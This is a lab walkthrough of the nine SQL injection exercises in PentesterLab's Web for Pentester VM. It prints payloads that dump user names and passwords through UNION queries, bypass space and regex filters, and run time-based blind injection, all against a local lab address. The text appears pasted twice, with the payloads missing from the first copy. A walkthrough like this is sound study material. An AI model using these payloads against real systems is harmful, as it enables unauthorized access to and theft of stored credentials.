Web for Pentester is a pre-configured Virtual Machine ISO prepared for practicing Web Pentesting by PentesterLab. Now in this article we going to look at the SQL Injection vulnerabilities. And in order to setup the Virtual Machine, please visit the link :
Link : Install and configure Web for Pentester VM
In web for pentester VM there are 9 exercise for SQL Injection vulnerability. Which are as follows :
To start with the examples just click on example links and it will open the example page.
At the above screenshot we can see the example 1 page. Now lets start with examples.
Example 1 :
The first takes user name as input and return details of given user name.
We can break the query with single semicolon and after that we can use or operator to balance out the query. Now our sqli payload will be :
To get number of columns in database table we can use below payload :
Extracting data from the database :
With union query :
payload :
As we can see that placeholder 1,2 and 3 are displayed on the screen. So lets dumping data from the database.
Payload :
database name : exercise
Extracting Table name :
Payload :
Table name : users
Extracting column names :
Payload :
Payload :
Column_names : id, name, age, groupid, passwd
Now lets dump the name and password of all users :
Payload :
Example 2 :
In this example, the back-end server will block the block space, so we need to some kind of padding in the blank spaces in our query. For example %a0, (where %a0 is nothing but a garbage value).
Now our query will be :
Payload :
Payload :
Example 3 :
In example 2 and 3 there are slightly difference in the space filter expression.
The exploitation process is same as example 2.
Payload :
Payload :
Example 4 :
In the example 4, the webapp will use php's mysql_real_escape_string() function to filter out the single quote and doble quote characters like : \x00, \n, \r, \, ', " and \x1a. But we can easily bypass it with below injection query :
Payload :
Payload for extracting data :
Payload :
Example 5 :
In this example, the regular expression is used to filter out the un-necessary characters and string.
Now according to above expression the query will must begin with the integer, now it can be also bypassed with the below sql query.
Payload :
Payload :
Example 6 :
This example is same as example 5 except that it checks that the query will must end with the integer.
Now with the below query we can bypass it.
Payload :
Payload :
Example 7 :
In example 7, the php code will only except the numerical values, and the regular expression will checks start as well as end of the provided input data. The regular expression used are :
And as we can see that the above expression contains m { preg_match('/^-?[0-9]+$/m') } is the PRCE_MULTILINE modifier, which only consider the first line of the input and after a line terminator the regex filter does not consider to filter any data. So it can be bypassed by using a line terminate character, for example %0a
So the payload will be :
Payload :
Payload :
Example 8 :
The example 8 will takes the user input and used that input on the "Order by" sql statement. The code for this example is :
As we can see that in the query there are also a back-tick " ` " will used. Now in this example we have to use the time based blind injection.
So the payload will be :
Payload :
http://www.sec-art.net/2018/08/blind-sql-injection-types-of-sql.html
Example 9 :
The example 9 is same as example 8 but in this example no back-tick is used.
So the payload will be :
Payload :
Conclusion :
At above we can exploit all the SQLI vulnerabilty in the Web for Pentester VM.
Also Checkout our other articles related to SQLI.
Link : Install and configure Web for Pentester VM
In web for pentester VM there are 9 exercise for SQL Injection vulnerability. Which are as follows :
To start with the examples just click on example links and it will open the example page.
At the above screenshot we can see the example 1 page. Now lets start with examples.
Example 1 :
The first takes user name as input and return details of given user name.
We can break the query with single semicolon and after that we can use or operator to balance out the query. Now our sqli payload will be :
' or 1=1 --+To get number of columns in database table we can use below payload :
root' order by 5 --+Extracting data from the database :
With union query :
payload :
' union select 1,2,3,4,5 --+ http://192.168.56.101/sqli/example1.php?name=' union select 1,2,3,4,5 --+As we can see that placeholder 1,2 and 3 are displayed on the screen. So lets dumping data from the database.
Payload :
' union select database(),version(),@@datadir,4,5 --+ http://192.168.56.101/sqli/example1.php?name=' union select database(),version(),@@datadir,4,5 --+database name : exercise
Extracting Table name :
Payload :
' union select 1, 2, table_name, 4,5 from information_schema.tables where table_schema=database() limit 0, 1 --+ http://192.168.56.101/sqli/example1.php?name=' union select 1,2,table_name, 4,5 from information_schema.tables where table_schema=database() limit 0,1 --+Table name : users
Extracting column names :
Payload :
' union select 1, 2, column_name, 4,5 from information_schema.columns where table_name="users" limit 0, 1--+ http://192.168.56.101/sqli/example1.php?name=' union select 1, 2, column_name, 4,5 from information_schema.columns where table_name="users" limit 0, 1 --+Payload :
' union select 1, 2, group_concat(column_name), 4,5 from information_schema.columns where table_name="users" --+ http://192.168.56.101/sqli/example1.php?name=' union select 1, 2, group_concat(column_name), 4,5 from information_schema.columns where table_name="users" --+Column_names : id, name, age, groupid, passwd
Now lets dump the name and password of all users :
Payload :
' union select 1, 2, group_concat(name,':', passwd), 4,5 from users --+ http://192.168.56.101/sqli/example1.php?name=' union select 1, 2, group_concat(name,':', passwd), 4,5 from users --+Example 2 :
In this example, the back-end server will block the block space, so we need to some kind of padding in the blank spaces in our query. For example %a0, (where %a0 is nothing but a garbage value).
Now our query will be :
Payload :
'%a0or%a01='1 http://192.168.56.101/sqli/example2.php?name='%a0or%a01='1Payload :
root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0' http://192.168.56.101/sqli/example2.php?name=root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0'Example 3 :
In example 2 and 3 there are slightly difference in the space filter expression.
The exploitation process is same as example 2.
Payload :
'%a0or%a01='1 http://192.168.56.101/sqli/example2.php?name='%a0or%a01='1Payload :
root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0' http://192.168.56.101/sqli/example2.php?name=root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0'Example 4 :
In the example 4, the webapp will use php's mysql_real_escape_string() function to filter out the single quote and doble quote characters like : \x00, \n, \r, \, ', " and \x1a. But we can easily bypass it with below injection query :
Payload :
100 or 1=1 http://192.168.56.101/sqli/example4.php?id=100%20or%201=1Payload for extracting data :
Payload :
100 union select 1,name,passwd,4,5 from users http://192.168.56.101/sqli/example4.php?id=100 union select 1,name,passwd,4,5 from usersExample 5 :
In this example, the regular expression is used to filter out the un-necessary characters and string.
Now according to above expression the query will must begin with the integer, now it can be also bypassed with the below sql query.
Payload :
100 or 1=1 http://192.168.56.101/sqli/example5.php?id=100%20or%201=1Payload :
1000 union select 1,2,group_concat(name,':',passwd),4,5 from users http://192.168.56.101/sqli/example5.php?id=1000 union select 1,2,group_concat(name,':',passwd),4,5 from usersExample 6 :
This example is same as example 5 except that it checks that the query will must end with the integer.
Now with the below query we can bypass it.
Payload :
100 or 1=1 http://192.168.56.101/sqli/example6.php?id=100 or 1=1Payload :
1000 union select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1 http://192.168.56.101/sqli/example6.php?id=1000 union select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1Example 7 :
In example 7, the php code will only except the numerical values, and the regular expression will checks start as well as end of the provided input data. The regular expression used are :
And as we can see that the above expression contains m { preg_match('/^-?[0-9]+$/m') } is the PRCE_MULTILINE modifier, which only consider the first line of the input and after a line terminator the regex filter does not consider to filter any data. So it can be bypassed by using a line terminate character, for example %0a
So the payload will be :
Payload :
100%0a or 1=1 http://192.168.56.101/sqli/example7.php?id=100%0a or 1=1Payload :
1000%0aunion select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1 http://192.168.56.101/sqli/example7.php?id=1000%0aunion select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1Example 8 :
The example 8 will takes the user input and used that input on the "Order by" sql statement. The code for this example is :
As we can see that in the query there are also a back-tick " ` " will used. Now in this example we have to use the time based blind injection.
So the payload will be :
Payload :
id`,(select if((database()) = database(), sleep(4), null))# http://192.168.56.101/sqli/example8.php?order=id`,(select if((database()) = database(), sleep(4), null))#http://www.sec-art.net/2018/08/blind-sql-injection-types-of-sql.html
Example 9 :
The example 9 is same as example 8 but in this example no back-tick is used.
So the payload will be :
Payload :
id,(select if((database()) = database(), sleep(4), null)) http://192.168.56.101/sqli/example9.php?order=id,(select if((database()) = database(), sleep(4), null))Conclusion :
At above we can exploit all the SQLI vulnerabilty in the Web for Pentester VM.
Also Checkout our other articles related to SQLI.